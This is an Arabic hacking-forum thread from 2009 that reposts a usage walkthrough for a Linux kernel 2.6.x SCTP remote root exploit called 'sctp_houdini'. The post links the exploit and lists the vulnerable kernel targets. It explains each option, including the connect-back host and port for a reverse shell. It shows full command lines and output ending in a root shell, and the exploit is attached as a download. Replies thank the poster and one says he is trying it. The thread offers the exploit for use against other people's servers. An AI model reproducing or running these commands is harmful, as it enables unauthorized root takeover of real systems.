التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 06-26-2009, 05:52 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية Spiral
 

 

 
إحصائية العضو








Spiral غير متواجد حالياً

إرسال رسالة عبر MSN إلى Spiral

 

 

إحصائية الترشيح

عدد النقاط : 10
Spiral is on a distinguished road

Thumbs up 2.6 sctp_houdini ريموت جديد ! شــرح


الســــلام عليكم شباب ..

اليوم نزل ريموت جديد للإصدار المصاب 2.6.x وبصراحة الظاهر قوي جدا .. ولاكن الترجمة شوية غلبتني وإن شاء الله بنزله خلال كم ساعه بلكثير ...

Linux Kernel 2.6.x SCTP FWD Memory COrruption Remote Exploit
كود:
http://www.milw0rm.org/exploits/8556
اللحين لنعرف كيف الريموت هذا يشتغل وعلى اي كيرنل بلضبط .. طبعا الشرح حصري شباب وخافوا الله بلسيرفرات العربية ... والله ماشرحت الطريقة الا لكم صديق ولنشر الطريقة لانها مو حصرية بس شوية تركيز تحتاج .. الريموت مو حصري ولاكن حاليا لن يتم نشره حتى إشعار اخر ..

نبتدي علبركة ..

كود:
[r1z@0wnEd ]# ./2.6.x-remote
./sctp_houdini
        -H lhost   (local host address for connect back shel)
        -P lport   (local port address for connect back shell)
        -h rhost   (remote target host)
        -p rport   (remote target port)
        -t kernel  (target kernel)
        -s sport   (source port defining sctp association where corruption occurs)
                   (always use higher port if you run the exploit multiple times eg. 20000, 21000, etc..)
                   (NEVER reuse the same or next port or vsys will be trashed and init will die soon...)
        -c conn    (number of connectionis before corruption - default 600)
[root@vps9224 html]# ./2.6-r -H 72.167.131.130 -P 5555 -h 72.167.131.130 -p 20000 -s 15000 -c 700 -t 2.4.21-53.ELsmp
Unable to find target: 2.6.24-19-xen
Available targets are:
- ubuntu64_faisty-2.6.20-[15-17]-generic  (faisty: generic kernel)
- ubuntu64_faisty-2.6.20-17-server  (faisty: server kernel - last 2.6.20-17 build)
- ubuntu64_hardy-2.6.24-[18-21]-generic  (kernel from 2.6.24-18 to kernel 2.6.24-21 -- generic)
- ubuntu64_hardy_2.6.24-[16-18]-server  (kernel from 2.6.24-16 to 2.6.24-18 -- server)
- ubuntu64_hardy-2.6.24-[19-22]-server  (kernel from 2.6.24-19 to 2.6.24-22 -- server)
- ubuntu64_hardy-2.6.24-23-last-server  (last 2.6.24-23 kernel before patch -- server)
- ubuntu64_intrepid-2.6.27-7-server  (kernel 2.6.27-7 -- server)
- ubuntu64_intrepid-2.6.27-[9-last]-server  (kernel 2.6.27-9 to the last unpatched kernel -- server)
- ubuntu64_intrepid-2.6.27-[7-last]-generic  (kernel 2.6.27-9 to the last unpatched kernel -- server)
- fedora64_10-2.6.25-117  (fedora core 10 default installed kernel)
- opensuse64_11.1-2.6.27.7-9-default  (opensuse 11.1 default installed kernel)
[r1z@0wnEd ]#
طيب اللحين اكيد المعظم يقول سهل التطبيق ؟ والمعظم ماهو فاهم شي .. لنشوف الشرح هاذ

كود:
-H lhostl
هذا الخيار من سيرفرك الي تخترق منه .. يعني لو سيرفر له الايبي

كود:
127.0.0.1
نحطه محل الايبي الي نبي نخترقه bOx ip

كود:
-P lport
هاذ البورت لازم يكون فاتح بسيرفرك ليتصل عليه سيرفر الضحية بعد الإكسبلويت مايتم
والي هو

كود:
5555
كود:
-h rhost
هو ايبي الضحية ( سيرفر الضحية ) نحط الايبي له وليكن

كود:
192.168.1.1
بورت الإتصال العكسي على سيرفر الضحية وليكن

كود:
20000
كود:
-t kernel
كيرنل الضحية بنجيبه بلامر هذا

كود:
uname -r
محتوى الامر هذا نكتبه والانواع المصابه بهذا الريموت هم

كود:
- ubuntu64_faisty-2.6.20-[15-17]-generic  (faisty: generic kernel)
- ubuntu64_faisty-2.6.20-17-server  (faisty: server kernel - last 2.6.20-17 build)
- ubuntu64_hardy-2.6.24-[18-21]-generic  (kernel from 2.6.24-18 to kernel 2.6.24-21 -- generic)
- ubuntu64_hardy_2.6.24-[16-18]-server  (kernel from 2.6.24-16 to 2.6.24-18 -- server)
- ubuntu64_hardy-2.6.24-[19-22]-server  (kernel from 2.6.24-19 to 2.6.24-22 -- server)
- ubuntu64_hardy-2.6.24-23-last-server  (last 2.6.24-23 kernel before patch -- server)
- ubuntu64_intrepid-2.6.27-7-server  (kernel 2.6.27-7 -- server)
- ubuntu64_intrepid-2.6.27-[9-last]-server  (kernel 2.6.27-9 to the last unpatched kernel -- server)
- ubuntu64_intrepid-2.6.27-[7-last]-generic  (kernel 2.6.27-9 to the last unpatched kernel -- server)
- fedora64_10-2.6.25-117  (fedora core 10 default installed kernel)
- opensuse64_11.1-2.6.27.7-9-default  (opensuse 11.1 default installed kernel)
كود:
-s sport
بورت الاتصال لبرنامج SCTP الي هو اختصار ل

كود:
 Stream Control Transmission Protocol (SCTP)
ولو كانلك شل على سيرفر المخترق نطبق الامر هذا لنشوف اذا السيرفر يحتوي على البرنامج ام لا
كود:
[r1z@0wnEd ]# locate sctp | grep `uname -r`
/lib/modules/2.6.24-19-xen/kernel/net/sctp
/lib/modules/2.6.24-19-xen/kernel/net/netfilter/nf_conntrack_proto_sctp.ko
/lib/modules/2.6.24-19-xen/kernel/net/netfilter/xt_sctp.ko
/lib/modules/2.6.24-19-xen/kernel/net/sctp/sctp.ko
[r1z@0wnEd ]#
كود:
-c conn
هذا الخيار للحجم الباكيت ( الإتصال ) بسيرفر الضحية والاغلب يكون 600 وتقدروا تحطوا رقم اكبر منه مثل 700 - 800

وبلنهاية

كود:
[r1z@0wnEd ]#./2.6.x-remote -H 127.0.0.1 -P 5555 -h 192.168.1.1 -p 20000 -s 15000 -c 600 -t fedora64_10-2.6.25-117
[**] Monitoring Network for TSN/VTAG pairs..
[**] Start flushing slub cache...
[**] Using TSN/VTAG pairs: (TSN: 28022e8 <=> VTAG: 41fdd4fb) / (TSN: 8cafd3ae <=> VTAG: 1a99396c)...
[**] Overwriting neightboard sctp map..
[**] Disabling Selinux Enforcing Mode..
[**] Overwriting neightboard sctp map ......
[**] Overwriting vsyscall shadow map..
[**] Hijacking vsyscall shadow map..
[**] Waiting daemons executing gettimeofday().. this can take up to one minute...
[**] ....
[**] Connected!
[**] Restoring vsys: Emulate gettimeofday()...
uid=0(root) gid=0(root) groups=51(smmsp) context=system_u:system_r:sendmail_t:s0


[r1z@0wnEd ]#GAME OVER
* ملاحظة ...
قبل لاتروتوا اي سيرفر تاكدوا ان السيرفر الي انتوا عليه او جهازك يتنصت على بورت 5555 للإتصال العكسي من جهاز الضحية ..


الريموت مترجم والباس

www.sec-r1z.com

ياليت الي ينشر الموضوع شباب يحفظ الحقوق

SecurityRules
www.sec-r1z.com


منقووول



2>6 sctp_houdini vdl,j []d] ! aJJvp

الملفات المرفقة
نوع الملف: zip 2.6.x-remote.zip‏ (10.6 كيلوبايت, المشاهدات 3)
:: نصائح مهمه :: - أفحص الملف المرفق بأي برنامج مضاد للفيروسات
2- قم بمراسلة المراقب عن أي مرفق يوجد به فيروس
3- المنتدى غير مسوؤل عن مايحتويه المرفق من بيانات
التوقيع

J0rd4n14n/.

 

   

رد مع اقتباس
قديم 09-21-2009, 01:08 AM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية brnce
 

 

 
إحصائية العضو





brnce غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
brnce is on a distinguished road

افتراضي


مشكور بارك الله فيك وجاري التجربة

   

رد مع اقتباس
قديم 09-21-2009, 01:45 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
KaLa$nikoV
VBSPIDERS TEAM

#~VoLc4n0~#

 
الصورة الرمزية KaLa$nikoV
 

 

 
إحصائية العضو







KaLa$nikoV غير متواجد حالياً

إرسال رسالة عبر MSN إلى KaLa$nikoV

 

 

إحصائية الترشيح

عدد النقاط : 11
KaLa$nikoV is on a distinguished road

افتراضي


مشكور على النقل

التوقيع



هل سأعود يوما
ام هي نهايه الطريق !!
إلهيْ ’ / أبدل عُسَرِنا يسُراً


لا تنسونا من دعائكم







سبحان الله والحمدلله ولا اله الا الله والله اكبر
fb.com/groups/VoLc4n0/
volc4n0@hotmail.com

 

   

رد مع اقتباس
قديم 09-29-2009, 01:33 AM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
الصورة الرمزية zaky092
 

 

 
إحصائية العضو





zaky092 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
zaky092 is on a distinguished road

افتراضي


بارك الله فيك

   

رد مع اقتباس
قديم 09-29-2009, 01:33 AM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
الصورة الرمزية zaky092
 

 

 
إحصائية العضو





zaky092 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
zaky092 is on a distinguished road

افتراضي


بارك الله فيك

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
يا بشر دى ثغره ريموت فايل انكلود ولا انا بهلوس EgY-HaCkEr جـــ'ابات العناكــ'ب 4 04-02-2010 03:02 AM
phpMyAdmin ريموت كومند !! PoC Spiral قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات 0 06-26-2009 09:32 AM
شــرح أختراق المواقــع [ بالصـور ] .. + .. الأسطوانآت [ بالفيديو ] KiLLer HaCkEr قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات 25 05-15-2009 05:40 AM


الساعة الآن 06:34 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0